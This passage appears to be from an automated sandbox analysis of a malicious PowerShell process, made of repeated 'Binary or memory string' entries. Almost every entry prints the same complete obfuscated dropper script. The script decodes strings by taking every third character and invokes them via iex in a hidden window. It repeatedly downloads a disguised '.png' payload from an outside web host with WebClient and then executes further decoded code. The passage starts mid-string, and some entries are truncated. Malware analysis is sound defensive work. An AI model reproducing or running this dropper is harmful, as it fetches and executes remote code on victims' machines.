,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)
Source: powershell.exe, 00000002.00000002.2489622695.0000020B74A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedea
Source: powershell.exe, 00000002.00000002.2490651768.0000020B74B9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde)
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(K
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe, 00000005.00000002.2202717320.00000000073F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +%SystemRoot%\System32\mswsock.dllt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.er.slNA.e.kt.E
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe	Binary or memory string: yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:O
Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361180627.0000020B5C460000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
